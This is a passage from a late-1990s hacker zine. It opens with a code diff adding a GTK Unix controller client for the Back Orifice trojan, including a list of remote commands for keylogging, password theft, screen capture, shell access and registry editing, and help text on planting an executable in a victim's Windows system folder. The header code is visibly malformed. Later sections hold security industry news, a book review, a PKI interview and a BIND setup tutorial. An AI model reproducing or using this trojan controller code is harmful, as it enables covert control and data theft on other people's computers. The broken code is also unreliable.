+ gtk_signal_connect (GTK_OBJECT (helpBUTTon), "clicked",
+ GTK_SIGNAL_FUNC (helpDialog), currentProbe);
+ gtk_box_pack_start(GTK_BOX(hbox), helpBUTTon, TRUE, TRUE, 0);
+ gtk_widget_show (helpBUTTon);
+
+ hbox = gtk_hbox_new(TRUE, 2);
+ gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 1, 2, 3, 4,
+ GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
+ gtk_widget_show (hbox);
+ exeBUTTon = gtk_button_new_with_label("Execute");
+ gtk_signal_connect (GTK_OBJECT (exeBUTTon), "clicked",
+ GTK_SIGNAL_FUNC (execute), currentProbe);
+ gtk_box_pack_start(GTK_BOX(hbox), exeBUTTon, TRUE, TRUE, 0);
+ gtk_widget_show (exeBUTTon);
+
+ // Text area, not editable, but our returned info goes here.
+ hbox = gtk_hbox_new(FALSE, 2);
+ gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 1, 3, 0, 1,
+ GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_FILL | GTK_EXPAND, 1, 1);
+ gtk_widget_show (hbox);
+ returnScreen = gtk_text_new(NULL, NULL);
+ gtk_text_set_editable(GTK_TEXT(returnScreen), FALSE);
+ gtk_text_set_word_wrap(GTK_TEXT(returnScreen), FALSE);
+ gtk_box_pack_start(GTK_BOX(hbox), returnScreen, TRUE, TRUE, 0);
+ gtk_widget_show (returnScreen);
+ rsScroll = gtk_vscrollbar_new (GTK_TEXT(returnScreen)->vadj);
+ gtk_box_pack_start(GTK_BOX(hbox), rsScroll, FALSE, FALSE, 0);
+ gtk_widget_show (rsScroll);
+
+
+ // Use vbox and label for text entries
+ vbox = gtk_vbox_new(FALSE, 2);
+ gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 1, 2, 1, 2,
+ GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
+ gtk_widget_show (vbox);
+ arg1Label = gtk_label_new("Unused:");
+ gtk_misc_set_alignment (GTK_MISC (arg1Label), 0, 0);
+ gtk_box_pack_start(GTK_BOX(vbox), arg1Label, FALSE, FALSE, 0);
+ gtk_widget_show (arg1Label);
+ arg1Text = gtk_entry_new_with_max_length(ARGSIZE);
+ gtk_widget_set_usize(GTK_WIDGET(arg1Text), 100, 0);
+ gtk_widget_set_name(GTK_WIDGET(arg1Text), "arg1Text");
+ gtk_box_pack_start(GTK_BOX(vbox), arg1Text, FALSE, FALSE, 0);
+ gtk_widget_show (arg1Text);
+
+ vbox = gtk_vbox_new(FALSE, 2);
+ gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 1, 2,
+ GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
+ gtk_widget_show (vbox);
+ arg2Label = gtk_label_new("Unused:");
+ gtk_misc_set_alignment (GTK_MISC (arg2Label), 0, 0);
+ gtk_box_pack_start(GTK_BOX(vbox), arg2Label, FALSE, FALSE, 0);
+ gtk_widget_show (arg2Label);
+ arg2Text = gtk_entry_new_with_max_length(ARGSIZE);
+ gtk_widget_set_usize(GTK_WIDGET(arg2Text), 100, 0);
+ gtk_widget_set_name(GTK_WIDGET(arg2Text), "arg2Text");
+ gtk_box_pack_start(GTK_BOX(vbox), arg2Text, FALSE, FALSE, 0);
+ gtk_widget_show (arg2Text);
+
+
+ // Text entries for Host and Port
+ vbox = gtk_vbox_new(FALSE, 2);
+ gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 1, 2, 2, 3,
+ GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
+ gtk_widget_show (vbox);
+ hostLabel = gtk_label_new("Host:");
+ gtk_misc_set_alignment (GTK_MISC (hostLabel), 0, 0);
+ gtk_box_pack_start(GTK_BOX(vbox), hostLabel, FALSE, FALSE, 0);
+ gtk_widget_show (hostLabel);
+ hostText = gtk_entry_new_with_max_length(ARGSIZE);
+ gtk_widget_set_usize(GTK_WIDGET(hostText), 100, 0);
+ gtk_widget_set_name(GTK_WIDGET(hostText), "hostText");
+ gtk_entry_set_text(GTK_ENTRY(hostText), "127.0.0.1");
+ strcpy(oldhost, "127.0.0.1");
+ gtk_box_pack_start(GTK_BOX(vbox), hostText, FALSE, FALSE, 0);
+ gtk_widget_show (hostText);
+
+ vbox = gtk_vbox_new(FALSE, 2);
+ gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 2, 3,
+ GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
+ gtk_widget_show (vbox);
+ portLabel = gtk_label_new("Port:");
+ gtk_misc_set_alignment (GTK_MISC (portLabel), 0, 0);
+ gtk_box_pack_start(GTK_BOX(vbox), portLabel, FALSE, FALSE, 0);
+ gtk_widget_show (portLabel);
+ portText = gtk_entry_new_with_max_length(5);
+ gtk_widget_set_usize(GTK_WIDGET(portText), 100, 0);
+ gtk_widget_set_name(GTK_WIDGET(portText), "portText");
+ sprintf(buff, "%i", PORT);
+ gtk_entry_set_text(GTK_ENTRY(portText), buff);
+ strcpy(oldport, buff);
+ gtk_box_pack_start(GTK_BOX(vbox), portText, FALSE, FALSE, 0);
+ gtk_widget_show (portText);
+
+ vbox = gtk_vbox_new(FALSE, 2);
+ gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 3, 4,
+ GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3);
+ gtk_widget_show (vbox);
+ passLabel = gtk_label_new("Password:");
+ gtk_misc_set_alignment (GTK_MISC (passLabel), 0, 0);
+ gtk_box_pack_start(GTK_BOX(vbox), passLabel, FALSE, FALSE, 0);
+ gtk_widget_show (passLabel);
+ passText = gtk_entry_new_with_max_length(ARGSIZE);
+ gtk_widget_set_usize(GTK_WIDGET(passText), 100, 0);
+ gtk_widget_set_name(GTK_WIDGET(passText), "passText");
+ gtk_signal_connect (GTK_OBJECT (passText), "changed",
+ GTK_SIGNAL_FUNC (update_value),
+ gtk_entry_get_text( GTK_ENTRY(passText) ) );
+ gtk_box_pack_start(GTK_BOX(vbox), passText, FALSE, FALSE, 0);
+ gtk_widget_show (passText);
+
+ // Show the window and start running
+ gtk_widget_show (window);
+ gtk_main();
+
+ return(0);
+
+}
+
diff -ruN bo/gspot.h bo_gspot/gspot.h
--- bo/gspot.h Wed Dec 31 16:00:00 1969
+++ bo_gspot/gspot.h Thu Dec 24 17:16:12 1998
@@ -0,0 +1,73 @@
+#define PROBE_STR_MAX 30
+
+struct probeListItem {
+ gchar Name[PROBE_STR_MAX + 1];
+ gchar firstArg[PROBE_STR_MAX + 1[];
+ gchar secondArg[[PROBE_STR_MAX + 1];
+}
+
+ gchar *probes[63][1] = { "HOST",
+ "QUIT",
+ "PING",
+ "PINGLIST",
+ "SWEEP",
+ "SWEEPLIST",
+ "SHELL",
+ "STATUS",
+ "PASSWD",
+ "DIR",
+ "CD",
+ "DEL",
+ "GET",
+ "PUT",
+ "COPY",
+ "FIND",
+ "FREEZE",
+ "MELT",
+ "VIEW",
+ "REN",
+ "MD",
+ "RD",
+ "INFO",
+ "PASSES",
+ "DIALOG",
+ "KEYLOG",
+ "REBOOT",
+ "NETVIEW",
+ "NETCONNECT",
+ "NETDISCONNECT",
+ "NETLIST",
+ "RESOLVE",
+ "SHARELIST",
+ "SHAREADD",
+ "SHAREDEL",
+ "PROCLIST",
+ "PROCKILL",
+ "PROCSPAWN",
+ "LISTCAPS",
+ "CAPSCREEN",
+ "CAPFRAME",
+ "CAPAVI",
+ "SOUND",
+ "REDIRLIST",
+ "REDIRDEL",
+ "REDIRADD",
+ "APPADD",
+ "APPDEL",
+ "APPLIST",
+ "REGMAKEKEY",
+ "REGDELKEY",
+ "REGLISTKEYS",
+ "REGLISTVALS",
+ "REGDELVAL",
+ "REGSETVAL",
+ "HTTPON",
+ "HTTPOFF",
+ "TCPSEND",
+ "TCPRECV",
+ "LOCKUP",
+ "PLUGINEXEC",
+ "PLUGINKILL",
+ "PLUGINLIST"};
+
+
diff -ruN bo/helpstrings.h bo_gspot/helpstrings.h
--- bo/helpstrings.h Wed Aug 5 21:35:31 1998
+++ bo_gspot/helpstrings.h Wed Dec 23 23:50:09 1998
@@ -11,7 +11,7 @@
char pinglisthelp[] = "\
PINGLIST - Pings a lits of ip addresses in a text file\n\
usage: pinglist localfilename\n\
- example: pinglist C:\bo\\bohosts";
+ example: pinglist /home/uname/bo/bohosts";
char sweephelp[] = "\
SWEEP - Sweeps a subnet with ping packets\n\
@@ -21,7 +21,7 @@
char sweeplisthelp[] = "\
SWEEPLIST - Sweeps a list of subnets in a text file\n\
usage: sweeplist localfilename\n\
- example: sweeplist c:\\bo\\dialups";
+ example: sweeplist /home/uname/bo/dialups";
char shellhelp[] = "SHELL - Opens a command shell";
@@ -49,13 +49,13 @@
char gethelp[] = "\
GET - Transfers a file from remote host to the local computer\n\
usage: get remotefilename localfilename\n\
- example: get c:\\warez\\photoshop.zip c:\\files\\photoshop5.zip\n\
+ example: get c:\\warez\\photoshop.zip /home/uname/files/photoshop5.zip\n\
note: If localfilename is not provided file is stored in current local directory";
char puthelp[] = "\
PUT - Transfers a file from local computer to the remote host\n\
usage: put localfilename remotefilename\n\
- example: put c:\\bo\\boupdate.exe c:\\windows\\system\\b.exe\n\
+ example: put /home/uname/bo/boupdate.exe c:\\windows\\system\\b.exe\n\
note: If remotefilename is not provided file is stored in current remote directory";
char copyhelp[] = "\
@HWA
41.0 Network Associates unveils middleware
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Network Associates unveils middleware
By Tim Clark
Staff Writer, CNET News.com
April 5, 1999, 9:45 a.m. PT
update Seeking to simplify security management, Network Associates today rolled out middleware
for securing corporate networks against computer viruses, outside intruders, and internal hackers.
Network Associates, which built its security product line through a series of acquisitions, also
is rolling out additions to its security software lineup and releasing new versions of its existing
security products.
The company is stopping short of a full, centralized console that a security administrator could
use to control all aspects of a corporation's network security. Instead, Network Associates is
offering middleware, called Event Orchestrator, which coordinates how different pieces of its
software communicate with each other.
For example, the security middleware could transfer information about an attack, detected by Network
Associates' CyberCop intrusion-detection software, to a Gauntlet firewall that could shut off the
entryway the attacker was using.
Among the new offerings: Client virtual private network (VPN) software that allows remote users to
dial in securely to corporate networks over the Internet, instead of using dedicated lines or toll
-free phone numbers. The VPN client is part of a new PGP VPN suite, named after one of the company's
early acquisitions, Pretty Good Privacy. The suite includes VPN server software, the company's
Gauntlet firewall, and a public key infrastructure (PKI) for issuing and managing digital certificates.
The new VPN client, designed for mobile users or extranet connections with business partners, is built
on PGP desktop encryption software that scrambles data sent via email or stored securely in files or
on disks.
The VPN suite is part of the "Active Security" suite that Network Associates is unveiling before
today's opening day baseball game of the Oakland As against the New York Yankees, scheduled
this evening in the newly renamed Network Associates Coliseum in Oakland.
Network Associates also released version 5.0 of its Gauntlet firewall and CyberCop 5.0, its intrusion
protection product that includes Sting, a decoy that lures hackers into parts of a network where they
can be detected and caught.
Network Associates also announced security partnerships with Microsoft for its proxy server and
Windows 2000, Hewlett-Packard, Sun Microsystems, public key infrastructure firms Entrust, and
VeriSign, Cigna, and systems integrators Ernst & Young, PricewaterhouseCoopers, KPMG, and
GTE Government Systems.
Network Associates began as an anti-virus software vendor, and its MacAfee anti-virus products are
widely used. After merging with Network General in late 1997, the company changed its name to Network
Associates and continued to acquired security companies and their products, including encryption firm
PGP, firewall maker Trusted Information Systems, European antivirus vendor Doc Solomon, and intrusion
-detection firm Secure Networks.
But Network Associates' "suite strategy"--in which it offers a full line of security software--has
drawn criticism.
In a Forrester Research report published in late 1998 the research firm argued that "security suites
are nothing more than point products cobbled together. By the time vendors properly integrate them, a
shift in Fortune 1000 security buying patterns and security requirements will conspire to make monolithic
suites irrelevant."
Critics have contrasted the security suite strategy with the "best of breed" approach taken by other
vendors who create individual products in separate security technologies. In recent months, Network
Associates executives have been calling its offerings "a best-of-breed security suite."
@HWA
42.0 Book review: "Hacker Proof" Lars Klander 1997
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Rob Slade" <rslade@sprint.ca>
BKHKRPRF.RVW 990228
"Hacker Proof", Lars Klander, 1997, 1-884133-55-X, U$54.95/C$74.95
%A Lars Klander lklander@jamsa.com
%C 2975 S. Rainbow Blvd., Suite 1, Las Vegas, NV 89102
%D 1997
%G 1-884133-55-X
%I Jamsa Press/Gulf Publishing Co.
%O U$54.95/C$74.95 800-432-4112 fax 713-525-4670 starksm@gulfpub.com
%P 660 p. + CD-ROM
%T "Hacker Proof: The Ultimate Guide to Network Security"
There is a great deal of information on security contained within this
book. Unfortunately, it is presented without a cohesive framework. The
overall impression is good. A lot of the forms that would make up a
useful work are followed, such as a summary (rather ironically, in view of
the scattered nature of the text, called "Putting It All Together") and a
set of resources at the end of every chapter. The author seems to be
easily distracted, continually jumping to the next, more sensational,
topic.
Although not divided into parts, the contents do have some logical
divisions. Initially, we are presented with what seems to be intended as
background material, although the scattergun approach leaves all of the
synthesis up to the reader. Chapter one is a rather unfocussed
introduction, talking as much about Internet technologies as about
security. Errors are rather common, ranging from chunks missing out of
sentences to figures with no cutlines to security weaknesses that are
essentially duplicates of each other to mailing lists that haven't
distributed material for years (with contact addresses that are even
older). Theoretically the networking concepts and details in chapter two
might aid in understanding system vulnerabilities, but in the fact of the
book they do not seem to be used effectively. The discussion of firewalls
does not provide sufficient information about either the needs,
weaknesses, or possible inconveniences of the different types in chapter
three. The material on encryption, in chapter four, mentions a number of
the currently important standards, but the explanations are so flawed that
the chapter could not be used to inform a decision on the strength or use
of a cryptographic system. Material on the use of digital signatures is
fairly short, and the remainder of chapter five rehashes, with really
expanding, old ground.
Another section tries to delve into more networking protocols. Chapter
six, on HTTP (HyperText Transfer Protocol), is somewhat disjointed, and,
again, fails to seriously examine the security implications. S-HTTP
(Secure HyperText Transfer Protocol), in chapter seven, deals mostly with
packets and commands, although it does have some limited discussion of
function. The Secure Socket Layer (SSL) seems to look primarily at
arcana rather than use.
Chapter nine looks at a few common forms of attack, but presents
information somewhat at random. Kerberos is reasonably well described in
chapter ten. Some types of electronic commerce technology are mentioned
in chapter eleven. There is an extremely limited look at auditing in
chapter twelve, first for UNIX and then for NT. A very rough look at
security issues within the Java programming language makes up chapter
thirteen. Chapter fourteen's look at viruses has good basic explanations,
but is unreliable in practice.
The remaining chapters generally look at security for specific systems.
Chapters fifteen to seventeen very quickly talk about individual security
functions in NT, NetWare, and UNIX, but fail to analyze, for example, the
effective rights granted by combinations of the different privilege
granting mechanisms. SATAN (System Administrator's Tool for Analyzing
Networks) for UNIX and Kane Security Analyst for NT get quick overviews in
chapter eighteen. Chapter nineteen presents a number of security
vulnerabilities with the Netscape and particularly the Internet Explorer
Web browsers. CGI (Common Gateway Interface) form weaknesses are
discussed in chapter twenty, but with so many different languages that the
ultimate advice is simply don't make a mistake when programming.
The final chapter is a reasonable look at security policies. However,
with some many items missing from the background provided, the chance of
producing a good policy at this point is relatively small.
As with "Maximum Security" (cf. BKMAXSEC.RVW), this book attempts to cover
the enormous field of security by throwing out as many bits as possible.
Therefore large holes are apparent in the coverage. In addition, the book
lacks an overall framework that could be used to build a security
structure and point the way to vulnerabilities that were not addressed.
For those who already are well comfortable with security as a concept,
this volume does have a lot of references that might be of use. For those
new to the topic, it is not reliable enough to start with.
copyright Robert M. Slade, 1999 BKHKRPRF.RVW 990228
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
43.0 The Year Of PKI (Public Key Infrastructure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek milewski <darekm@cmeasures.com>
http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/14/n03-14.47.htm
<a href="http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/14/n03-14.47.htm">Link</a>
The year of PKI
The growing need for secure Web transactions will
boost PKI implementations at Entrust Technologies
By Matthew Nelson
Network security has become a necessity with the spread of Internet
commerce and the expansion of intranets to larger extranets. But with
differing network systems, secure connections that are constantly updated
can be a difficult proposition. One possible solution is the use of
public key infrastructure (PKI) systems and digital certificates. To
discuss PKI and what it means for the enterprise, InfoWorld Senior Writer
Matthew Nelson recently sat down with John Ryan, chief executive officer
of Entrust Technologies, one of the leading PKI system providers.
InfoWorld: Do you consider 1999 the year of PKI?
Ryan: There's no question that the recognition by companies that they will
all need a PKI is now upon us, and we're seeing incredible acceleration of
pilot activity and recognition across our customer base. So I think this
year will be the year where people recognize they will definitely have a
PKI in their enterprise and start the methodical planning to ensure they
pick the right one.
InfoWorld: Why is PKI seeing adoption now when it is a technology that has
been around for quite awhile?
Ryan: Not unlike the Internet [that] was around for almost 20 years before
all of a sudden it took off, there's been some fundamental things that
happened in the enterprise that have now driven the need, and made it a
lower risk decision for the enterprise. The first was certificates, or PKI
capabilities, which were embedded in the browsers. The next thing that
happened was the major 20 vendors in the networking world -- the whole
crew in networking and firewalls -- all standardized around a standard
called IP SET [Secure Electronic Transaction], which includes digital
certificates. So basically, each application in an enterprise now, or the
major applications of an enterprise backbone, are including security as a
fundamental element, which is forcing companies to consider a public key
infrastructure.
InfoWorld: What developments should IT managers expect to see during the
next year?
Ryan: I think you're going to see a much more wide-scale enablement of
applications, which really is going to make it much simpler for the
enterprise to install a PKI, because the applications will be ready to
accept it.
I also think you're going to see networks of trust being created. I think
one of the first ones we saw was the banking community with their global
trust organization, which is a high-value, high-trust network for
Web-based electronic transactions.
InfoWorld: Is there a problem with interoperability between different
companies' digital certificates?
Ryan: Fortunately, the industry standards that enable interoperability
have now passed. But actually, we now can support interworking with
VeriSign, GTE, Microsoft, Netscape, and others, today, in our product. So
we actually do have full interoperability in our product and we can create
webs of trust that include VeriSign or GTE certificate authorities, webbed
with an Entrust certificate authority, into a network of PKI networking.
And we really see that as an innovation that the market has not yet
anticipated. The evolution will then give customers choices and the
ability to scale their networks based on what they've bought to date.
InfoWorld: Has that interoperability created a different kind of
competition between Entrust and your competitors?
Ryan: We have always worked with large enterprises and basically delivered
a guaranteed security system that they could buy and integrate every
application into it, and have single sign-on and consistent policies and
practices.
Our competitors are more focused around the authentication market. They
don't provide encryption or digital signature, they really count on all
the various applications to embed that technology. So we really don't
compete that often, head-to-head. But I think you'll see, as we migrate
through this year, a much larger movement with our service provider
program.
We have partnerships with many service providers, which are more analogous
to the VeriSign model, but with the full Entrust product suite, combined
with our ability to implement Entrust Worldwide, a global network that
we've just created. We'll be able to create really hybrid PKI networks
where a piece of the PKI is on the customer's premises, and controlled by
them.
Another piece of the PKI might be controlled by a service provider, and we
can connect them together seamlessly to be able to enable PKI networking
and then extend that web of trust to other companies, so that you can
create a community of interest to conduct electronic commerce.
InfoWorld: If digital certificates are all going to interoperate, how are
companies going to differentiate themselves from their competitors?
Ryan: That part is going to be an exciting revolution because it will
evolve very similarly to the credit card business, and I believe that the
card or the certificate will become a brand position. I might have a
Citibank Certificate just like I have a Citibank MasterCard.
And I can see that there will be a battle for that identity, and I really
believe you're going to find there are credentials that you can use across
a number of services, and that credential may be issued by a bank, or a
telephone company, or a government. And then I think that most
organizations who really care about branding and positioning will issue
certificates to their customers. So a person will end up with probably the
same number of certificates as they have credit cards.
InfoWorld: Do you think the cessation of year-2000 projects is going to
have an effect on the adoption of security products and specifically PKI
systems?
Ryan: Certainly there's no doubt, it's a very critical element that's on
the mind of every CIO. I think it's helping accelerate PKI in the first
six months of the year because I think behind year 2000, many of our
corporate customers are telling us security is the next, No. 2 critical
item. And they have to get it fixed, but they want to get going right
away, before the latter part of the year comes when they're fearful that
they're going to be a little bit busy with year-2000 testing, if they
haven't got there yet.
In the second half of the year, we've pretty much said it could slow down
as far as implementation goes. But we actually think that people are going
to solve a lot more of the problem than they thought, and are actually
going to be in a position to have the ability to buy the technology for
implementation in the year 2000.
We're cautiously optimistic right now, but we actually see it as an
accelerator in the short term, and then we'll be waiting and seeing what
happens. We also have seen though -- without doubt -- once the year-2000
bug is done, everybody has said security will become the next No. 1
priority. So I think that that speaks well for the position that we see
emerging in the enterprises.
@HWA
-=-----------------------------------------------------------------------=--
Special section, Port number assigments, setting up DNS and BIND under fBSD
-=-----------------------------------------------------------------------=--
SP.01 Port # assigments
~~~~~~~~~~~~~~~~~
This comes up so frequently i've decided to include it in this issue - Ed
(from http://www.isi.edu/in-notes/iana/assignments/port-numbers)
<a href="http://www.isi.edu/in-notes/iana/assignments/port-numbers">Source</a>
<a href="./port-numbers.txt">Local copy</a> (included in zipped version)
@HWA
SP.02 Setting up DNS and BIND under FreeBSD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Featured Articles: DNS and BIND
from http://www.freebsdzine.org/199902/features/dns.shtml
## DNS and BIND
## Damon Slachter [ razorz@jagged.net ]
With domain names becoming the "thing to have" these days, some people are feeling left out. If you are one of those people
this article just might be for you. I will be concentrating on the BIND implementation of DNS and hopefully, by the end of
reading this you will have a fully functional bind server.
What is BIND?
BIND (Berkeley Internet Name Domain) was written by Kevin Dunlap for the 4.3BSD UNIX operating system as a
implementation of the Domain Name System, or DNS. Since its early release for 4.3BSD, BIND has been ported to virtually
all flavors of UNIX and Microsoft Windows NT. BIND has since been maintained by the Internet Software Consortium.
Before we start I will be assuming you know basic unix commands such as ls, cd, cp, mkdir and others like it. If not, my best
advise is to stick around in #FreeBSD on Undernet more often or find a basic unix tutorial. With this being said, your ready to
enter the realm of DNS/Bind.
Installing the bind8 server is a simple task and can be achieved by doing the following,
# cd /usr/ports/net/bind8
# make
# make install
By executing these few commands you tell the makefile to download the source for bind8, compile it and then install it. Now
that the Bind server is installed, we get into the config files themselves.
# cd /etc
# ls
In the /etc directory you should have the file named.conf, if not lets make one, if so you must edit it anyhow.
options {
directory "/etc/namedb/"; // Config file directory
};
zone "jagged.net" in { // Domain you control/own
type master;
file "db.jagged"; // the file used for domain config
};
zone "159.243.207.in-addr.arpa" in { // IP address 207.243.159.x
type master;
file "db.207.243.159"; // Again, file that controls this
};
zone "0.0.127.in-addr.arpa" in { // Local loop zone
type master;
file "db.127.0.0"; // file controlling this IP field
};
zone "." in { // Default, root name servers
type hint;
file "db.cache"; // Cache file of Internic NS's
};
Thats basically it for the /etc/named.conf file, here are a few pointers.
Pointers for named.conf
zone "159.243.207.in-addr.arpa" in {
This line will be used for reverse information on the Class C IP block of 207.243.159.0/24. Do not use 159.243.207, use your
actual IP address block, minus the last number.
Now its time to get the actual domain database files (ie: db.jagged) setup.
# cd /etc
# mkdir namedb
# ls
You will need to ftp to rs.internic.net/domain/ and download named.root and then rename the file as db.cache and your good to
go.
This is where the reverse names for your IP's are created.
In the /etc/namedb dir use your favorite editor, may it be vi, ee or pico and make 3 files.
# pico db.127.0.0
In db.127.0.0 file you need the following:
@ IN SOA ns1.jagged.net. ns2.jagged.net. (
1 ; Serial #
10800 ; Refresh after 3 hours
3600 ; Retry after 1 hour
604800 ; Expire after 1 week
86400 ) ; Minimum TTL of 1 day
IN NS ns1.jagged.net.
IN NS ns2.jagged.net.
1 IN PTR localhost.
The "IN NS nsX.jagged.net." lines can be replaced by your dns server's hostname such as sun.jagged.net. or
hellspawn.jagged.net. You can also put your ISP's nameserver as the secondary one.
***** TIP: The serial # must be changed every time you edit the file if you want your records to be correctly updated. You can
also create serial number in the YYYYMMDDTTTT format (Year, Month, Date, Time: 199901210230 or 9901210230
******
Next,
# pico db.207.243.159
207.243.159 would be replaced by your actual IP address, not the full address only the first 3 #'s.
@ IN SOA ns1.jagged.net. ns2.jagged.net. (
1 ; Serial
10800 ; Refresh after 3 hours
3600 ; Retry after 1 hour
604800 ; Expire after 1 week
86400 ) ; Minimum TTL of 1 day
IN NS ns1.jagged.net
IN NS ns2.jagged.net.
93 IN PTR jagged.net.
This is the file where you will specify the reverse DNS for your internet IP address. In most cases you will not have reverse
delegation over your IP (the ability to set this yourself), but you need to set it up anyways.
The line 93 IN PTR jagged.net. is the actual line that specifies what this IP will reverse as, example:
> nslookup 207.243.159.93
Server: jagged.net
Address: 207.243.159.93
Name: jagged.net
Address: 207.243.159.93
For a user with only a hostname such as sun.jagged.net you would just use 93 IN PTR sun.jagged.net.
Now comes the fun part, creating your hostnames!
# pico db.jagged
Where jagged is the name of YOUR actual domain or the hostname your ISP has set for you, i.e.: sparcstation.jagged.net. You
may still use the db.jagged file for this but you must specify sparcstation.jagged.net in the /etc/named.conf file.
@ IN SOA ns1.jagged.net. ns2.jagged.net. (
1 ; Serial
10800 ; Refresh after 3 hours
3600 ; Retry after 1 hour
604800 ; Expire after 1 week
86400 ) ; Minimum TTL of 1 day
IN NS ns1.jagged.net.
IN NS ns2.jagged.net.
localhost IN A 127.0.0.1
jagged.net. IN A 207.243.159.93
ns1 IN CNAME jagged.net.
ns2 IN CNAME jagged.net.
ftp IN CNAME jagged.net.
mail IN CNAME jagged.net.
www IN CNAME jagged.net.
jagged.net. IN MX mail.jagged.net.
Here is a brief explanation of what these lines mean.
jagged.net. IN A 207.243.159.93
This is the forward lookup for the jagged.net domain.
www IN CNAME jagged.net.
This creates a "sub domain" or hostname off the root domain jagged.net.
The "IN MX" feature of BIND can only be described using a scenario like the following.
Imagine you are a network admin and your company needs a separate server just for email. Sure, no problem, but now people
have to send email to foobar@mail.jagged.net. This isn't a problem but foobar@jagged.net looks much better to you and your
boss so you do the following:
jagged.net. IN MX mail.jagged.net.
Meaning the "Mail Exchange" jagged.net. points to mail.jagged.net. This command gets much more complicated so I will stop
here.
Now that all of your config files are ready you can now start the bind server.
# /usr/local/sbin/named
This starts the named server.
***** TIP: If you make changes to your db files just use the command
killall -HUP named to reload your named server. ******
Now you are ready to test out your named server for the first time. You might want to change /etc/resolv.conf so it points to
your name server:
domain JAGGeD.net
nameserver 207.243.159.93
Type nslookup and you should see something along the lines of
> nslookup
Default Server: jagged.net
Address: 207.243.159.93
>
If you don't see something close to this then something isn't configured right. Go back through the steps mentioned above and
see if you typed something wrong.
I hope you enjoyed the first edition of the DNS/Bind server startup guide and have found it useful. If you have ANY questions
please feel free to join us in #FreeBSD on the Undernet IRC servers. My nickname is RazorZ and I would be more than happy
to help you with any problems you might encounter.
Good luck!
-- Damon Slachter
-- a.k.a. RazorZ
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
